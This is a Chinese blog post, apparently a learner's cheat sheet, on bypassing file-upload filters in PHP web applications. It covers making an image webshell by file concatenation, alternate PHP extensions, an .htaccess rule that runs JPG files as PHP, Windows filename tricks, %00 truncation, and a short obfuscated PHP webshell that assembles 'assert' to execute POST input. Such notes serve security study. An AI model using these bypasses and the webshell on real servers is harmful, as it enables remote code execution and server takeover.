Learn file upload vulnerability | Network security

已于 2023-04-04 14:24:39 修改
阅读量924 收藏
点赞数
分类专栏: Network security 文章标签: php 开发语言 网络安全 安全
于 2023-04-02 15:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44340129/article/details/129907538
版权

本文授权自 MagicBoy

Learn file upload vulnerability | Network security

1.文件上传漏洞条件

  1. 上传文件的名称、后缀名、内容用户可以自定义设置;

  2. 上传文件的路径可以获取;

  3. 上传文件所在文件夹具备可执行权限;

2. Bypass 技巧

  1. 前端过滤
    抓包修改后缀名、禁用JS

  2. 类型过滤
    上传图片马、修改后缀名
    制作图片马: copy 1.jpg/b+muma.php/a muma.jpg
    图片类文件头: GIF89a

  3. 黑名单过滤
    禁用php后缀名时,使用畸形后缀名:phtml、php3、php4、php5、pht、php2

  4. 上传 .htaccess 文件,更改解析配置
    AddType application/x-httpd-php .jpg:将 jpg 文件当成 php 进行解析

配置方式:
1. 将 httpd.config 中的 Option FollowSymLinks 从 AllowOverride None 修改为 ALLowOverride all
2. 将 LoadModule rewrite_module modules/mod_rewrite.so 前的 # 去除

  1. windows特性绕过
    windows保存文件时,后缀末尾不会保存 .空格::$DATA
    可以尝试将 muma.php 修改为:muma.php.、muma.php空格muma.php.空格.、muma.php::$DATA

  2. 大小写绕过
    php 修改为 phPpHp
    将禁用的函数 eval 等进行大小写

  3. 双写绕过

  4. %00截断
    对 php 版本和配置有要求。PHP版本=5.2.17,且 php.ini 中 magic_quotes_gpc Off

  5. 一些小知识

图片类文件头: GIF89a

命令执行函数:

函数名作用
eval命令执行
system命令执行
assert与eval类似,assert函数是直接将传入的参数字符串当成PHP代码直接
exec命令执行,需要打印输出执行结果,且它只会输出最后一行的内容

读取文件cattaclessmoreheadtailstringspastenl//

变量拼接

assert, system 可以动态拼接(php 版本小于8),eval 不可以

<?php 
$a = "ass";
$b = "ert";
$c = $a.$b;
$c($_POST['c']);
?>

如有侵权,请联系作者删除

小饅頭
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
【FCKeditor文件上传漏洞及利用 - File-Upload-Vulnerability-in-FCKEditor1】 本文主要探讨了FCKeditor(现称为CKeditor)中的PHP文件上传模块存在的安全漏洞,允许攻击者绕过文件类型检查,将恶意PHP代码上传到...
Web安全系列:文件上传漏洞从入门到精通
weixin_68076304的博客
02-27 534
文件上传漏洞简介文件上传漏洞(File Upload Vulnerability)是一种常见的 Web 应用程序漏洞,通常存在于需要用户上传文件的应用程序中,如论坛、电子商务网站、博客、社交网站等。攻击者可以通过该漏洞上传恶意文件到服务器,从而执行各种攻击操作,如执行命令、窃取敏感数据、植入后门等。文件上传漏洞通常发生的原因多是服务器未正确验证上传文件类型、大小、路径等参数等,攻击者可以利用这些漏洞绕过服务器的限制,上传恶意文件或脚本到服务器。
DVWA & Vulnerability: File Upload(文件上传)
TenG的博客
09-11 1329
菜鸟前言: 绕过方法有很多,这里只是讲几种我知道的方法,本人也是菜鸟一枚,写的不正确的地方欢迎大佬纠正,本篇博客也是为了记录一下自己踩到的坑,记录自己成长的点滴,以后方便查看,同时也希望能够帮到各位朋友,感谢! 环境:Windows10 DVWA 工具:BurpSuite 蚁剑 蚁剑工具和中国菜刀都可以 难度等级以及绕过方法: low: 先看源码: <?php if( isset( $_POST[ 'Upload' ] ) ) { // Where are we going to be wr
File upload vulnerabilities 文件上传漏洞
最新发布
jamesP777的博客
05-12 258
File Upload Vulnerabilies 文件上传漏洞是指服务器允许用户上传文件名、类型、内容、大小等没有经过充分校验的文件。对文件的这些属性如果不加验证,可能会导致一个简单的图片上传功能被用来上传任意有潜在危险的文件。甚至是上传服务器端脚本文件从而进行远程代码执行。有时,上传文件本身就会导致危险。其他攻击者可以在文件中嵌入一个HTTP跟踪请求,让服务器来执行。
[漏洞检查项]File Upload Vulnerabilities| 文件上传漏洞
m0_46101480的博客
11-08 84
攻击者可以利用文件上传功能,上传恶意文件,包括木马后门文件,对服务器造成危害。.上传文件重命名,尽量少的从客户端获取信息,包括文件名、文件类型、文件内容等;.避开空格、点 . 、 ::$DATA 等windows 系统特性。.严格控制权限(读、写和执行权限),执行权限与写权限分离。web应用开放了文件上传功能,包括头像上传,附件上传等。.采用白名单策略,严格限制上传文件的后缀名;.建立单独的文件储存服务器,类似于站库分离。用户可以利用文件上传功能向服务器上传文件。.及时更新Web 容器,防止解析漏洞产生。
Vulnerability: File Upload(low)--MYSQL注入
XiaoYeZhu_1314的博客
12-08 478
设置->病毒和威胁保护->“病毒和威胁保护”设置,点击管理设置->翻到最下面,找到“排除项”-点击添加或删除排除项。1.在Vulnerability: File Upload页面上传“一句话木马.php”下载中国蚁剑(设置空目录要设置在antSword-master下)2.选择模式,这里我们选择 文件上载的最低级模式(low)这个就是上传路径,../表上一级目录。1.打开DVWA,并登录账户。将这个粘贴到,再获取他的地址。在vsc里面写个一句话木马。2.打开蚁剑,右击鼠标。
Vulnerability: File Upload(Medium)--MYSQL注入
XiaoYeZhu_1314的博客
12-08 360
2.下载BurpSuiteCommunit软件:百度搜索“burp suite官网” 下载地址www.portswigger.net/burp/1.打开BurpSuiteCommunit软件,把intercept is off 打开,获取流量包。3.上传“一句话木马.php”,再点击Upload,获取到流量包。2.选择模式,这里我们选择 文件上载的中级模式(Medium)最后,可能还有不知道这个值是哪里来的,为什么要写这个值?3.打开火狐浏览器,下载扩展“Foxy”1.打开DVWA,并登录账户。
SecTools.Org Top 125 Network Security Tools
03-30
Security-oriented operating systems (5) Packet sniffers (14) Vulnerability exploitation tools (11) Traffic monitoring tools (10) Vulnerability scanners (11) Web proxies (4) Web vulnerability sc
Network Scanning Cookbook
10-19
you will learn how to carry out various key scanning tasks, such as firewall detection, OS detection, and access management, and will look at problems related to vulnerability scanning and ...
Intrusion Detection: Network Security beyond the Firewall
02-18
Why Intrusion Detection Is Needed after Network Security PART 2—Intrusion Detection: Beyond Traditional Security Chapter 5—Intrusion Detection and Why You Need It Do You Have Protection? The ...
Identification of Vulnerability in Smart Grid Based onComplex Network Theory
02-09
Identification of Vulnerability in Smart Grid Based onComplex Network Theory
文件上传漏洞揭密剖析(一)-文件上传漏洞原理
zhujiu_fu的博客
02-16 766
文件上传漏洞(File Upload Vulnerability)是一种常见的 Web 应用程序漏洞,通常存在于需要用户上传文件的应用程序中,如论坛、电子商务网站、博客、社交网站等。攻击者可以通过该漏洞上传恶意文件到服务器,从而执行各种攻击操作,如执行命令、窃取敏感数据、植入后门等。文件上传漏洞通常发生在服务器未正确验证上传文件类型、大小、路径等参数的情况下,攻击者可以利用这些漏洞绕过服务器的限制,上传恶意文件或脚本到服务器。
burpsuit 靶场(File upload vulnerabilities)
wanan的博客
01-22 181
burpsuit 靶场(File upload vulnerabilities)
Joomla Component com_uploader) Remote File Upload Vulnerability
cnbird's blog
01-30 1606
http://packetstormsecurity.org/1001-exploits/joomlaarticlemanager-sql.txt || || | || o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
DVWA通关详解
weixin_45808483的博客
11-19 3552
Vulnerability: Brute Force Security level is currently: low. 分析源码: 没有做身份验证 <?php //检查变量是否设置(先看有没有Login参数) if( isset( $_GET[ 'Login' ] ) ) { //获取密码,存入pass变量中 $user = $_GET[ 'username' ]; //获取密码 $pass = $_GET[ 'password' ]; //将密码使用md5加密 $
DVWA & File Upload文件上传最详细绕过
热门推荐
Hackpatrick的博客
08-04 2万+
DVWA的使用练习: 今天学习的内容很有意思,也很实用。 DVWA其实本质上就是一个脆弱系统,它需要的是php+mysql的环境,旨在为安全人员提供一个合法的环境用来测试自己的专业技能和工具,并且让web安全工作着深刻的理解漏洞防范和入侵的本质原理,很适合我们这种小白锻炼自己,好废话不多说。。。。。 首先DVWA环境安装: 在下载DVWA之前我们需要一个php+mysql的环境,apach...
Arbitrary file upload vulnerability
Summer's blog
05-13 3185
admin login required. Under the template interface in the administrator interface, upload a normal file 1.txt burp intercept request package modify the file name to 1.jsp or any other suffix. Includin...
dom4j:dom4j: 1.6.1 Known security vulnerability: 2 Security advisory: 0 Exploits: unavailable Highest severity: high Recommendation: N/A Dependency Analytics Plugin [Powered by Snyk]
06-09
这不是一个问题,而是一个关于一个Java库的安全问题的声明。dom4j库的版本1.6.1已知存在一个高危安全漏洞,但没有已知的攻击利用此漏洞的情况。目前没有建议升级或使用其他版本。这个声明是由Dependency Analytics Plugin [Powered by Snyk]提供的,它是一个帮助开发人员识别和解决安全问题的工具。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

小饅頭

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值